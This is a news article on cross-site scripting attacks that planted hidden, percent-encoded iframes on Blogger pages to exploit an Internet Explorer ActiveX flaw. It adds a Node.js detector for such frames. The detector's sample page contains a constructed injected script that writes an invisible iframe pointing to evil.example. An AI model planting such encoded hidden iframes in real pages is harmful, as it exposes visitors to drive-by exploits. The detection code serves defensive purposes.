A few weeks ago, casual visitors to the official Super Bowl XLI site were exposed to malicious exploits, not by design but because vandals had tampered with a legitimate Web page. One technique for doing this is cross-site scripting: an attacker submits a snippet of script or markup somewhere the site will echo it back to its users, such as a URL parameter or a comment form. If the site is vulnerable (and many sites are), the Web server accepts the input without neutralizing it and writes it into the page it serves. In the persistent form of the attack, which is the one that matters for a blog, the injected code is stored on the server and delivered to every future visitor along with the page they intended to view.
Now, security vendor Fortinet reports that Google-owned Blogger.com sites are also vulnerable. Using Exploit Prevention Labs' LinkScanner Pro, CNET confirmed that one of the example blog pages Fortinet provided does currently contain an injected malicious iframe. Iframes let Web designers embed another document (often hosted on a different site) inside a main Web page; criminal hackers use the same mechanism to load an exploit page from a server they control, usually in a frame sized so that the visitor never sees it. In Fortinet's example, the iframe markup does not appear in plaintext: it is percent-encoded as a run of URL escape sequences, a "%" followed by two hexadecimal digits for each 8-bit byte (so "%3C" stands for "<"), which means it must be decoded before a person, or a simple keyword filter, can read what the code does.
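To show what a reviewer of such a page is up against, here is an added example (not code from the original article, Fortinet or CNET) in Node.js that decodes percent-encoded string literals the way a browser's unescape() would and flags iframes that are encoded, point off-site, or are sized to be invisible. The sample page, the blog host myblog.blogspot.com and the host evil.example are constructed for the example; the detail that the encoded iframe is written out by a script calling unescape() is an assumption about how such injections are commonly done, not something the article states.

```javascript
// Constructed sample page (not the real Blogger page). The injected script
// writes a percent-encoded iframe so the string "<iframe" never appears in
// the page source; a legitimate off-site embed is included for contrast.
const SAMPLE_PAGE = `
<html><body>
<h1>My blog</h1>
<p>Legit post text.</p>
<script>document.write(unescape("%3Ciframe%20src%3D%22http%3A//evil.example/x.htm%22%20width%3D%220%22%20height%3D%220%22%20frameborder%3D%220%22%3E%3C/iframe%3E"));</script>
<iframe src="http://www.youtube.com/embed/abc" width="425" height="350"></iframe>
</body></html>`;

// Decode every %XX escape byte-wise, exactly as unescape() does (no UTF-8
// reassembly), so we see the markup the browser would document.write().
function percentDecode(s) {
  return s.replace(/%([0-9A-Fa-f]{2})/g, (_, h) => String.fromCharCode(parseInt(h, 16)));
}

// Find string literals passed to unescape()/decodeURI()/decodeURIComponent()
// and return their decoded contents; these are where hidden markup lives.
function decodedWrites(html) {
  const re = /(?:unescape|decodeURIComponent|decodeURI)\(\s*(["'])((?:\\.|(?!\1).)*)\1\s*\)/g;
  const out = [];
  let m;
  while ((m = re.exec(html)) !== null) out.push(percentDecode(m[2]));
  return out;
}

// Parse <iframe ...> tags from both the plaintext page and the decoded
// literals into attribute maps, remembering which ones were encoded.
function extractIframes(html) {
  const decoded = decodedWrites(html).join("\n");
  const tagRe = /<iframe\b([^>]*)>/gi;
  const attrRe = /([\w-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+))/g;
  const found = [];
  for (const source of [{ text: html, encoded: false }, { text: decoded, encoded: true }]) {
    let m;
    while ((m = tagRe.exec(source.text)) !== null) {
      const attrs = {};
      let a;
      while ((a = attrRe.exec(m[1])) !== null) {
        attrs[a[1].toLowerCase()] = [a[2], a[3], a[4]].find((v) => v !== undefined);
      }
      found.push({ attrs, encoded: source.encoded });
    }
  }
  return found;
}

// Score each iframe: coming out of a percent-encoded literal or being sized
// or styled to be invisible are strong signals (2 points each); merely
// pointing off-site is weak (1 point), because legitimate embeds do that too.
// Report frames scoring 2 or more, so a plain YouTube embed is not flagged.
function findSuspiciousIframes(html, pageHost) {
  const findings = [];
  for (const { attrs, encoded } of extractIframes(html)) {
    const reasons = [];
    let score = 0;
    if (encoded) { reasons.push("percent-encoded"); score += 2; }
    let host = null;
    try {
      host = new URL(attrs.src || "", `http://${pageHost}/`).hostname;
    } catch (e) {
      reasons.push("unparseable-src"); score += 1;
    }
    if (host && host !== pageHost) { reasons.push(`off-site:${host}`); score += 1; }
    const w = parseInt(attrs.width, 10), h = parseInt(attrs.height, 10);
    if ((!Number.isNaN(w) && w <= 1) || (!Number.isNaN(h) && h <= 1)) {
      reasons.push("hidden-size"); score += 2;
    }
    if (/display\s*:\s*none|visibility\s*:\s*hidden/i.test(attrs.style || "")) {
      reasons.push("hidden-style"); score += 2;
    }
    if (score >= 2) findings.push({ src: attrs.src, score, reasons });
  }
  return findings;
}

// Usage: scan the constructed page as if it were served from myblog.blogspot.com.
console.log(JSON.stringify(findSuspiciousIframes(SAMPLE_PAGE, "myblog.blogspot.com"), null, 2));
```

The decode step is the important one: a filter that only greps the raw page for "<iframe" misses the injected frame entirely, while the decoded copy exposes the off-site, zero-by-zero frame immediately. The scoring deliberately tolerates ordinary off-site embeds so a blog full of video widgets does not drown the one real finding.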
Chances are the blog's owner did not put this code on the page and has not looked at it since publishing the original post. Running LinkScanner Pro on the page, we found that the injected code exploits a vulnerability in the RDS.Dataspace ActiveX control (CVE-2006-0003). Visitors who view this infected blog in Internet Explorer without the patch from Microsoft Security Bulletin MS06-014 are exposed to remote code execution on their desktops simply by loading the page. Fortinet says it has found other Blogger.com pages seeded with cross-site scripting code, on topics as diverse as Star Wars, school, furniture, and girlfriends.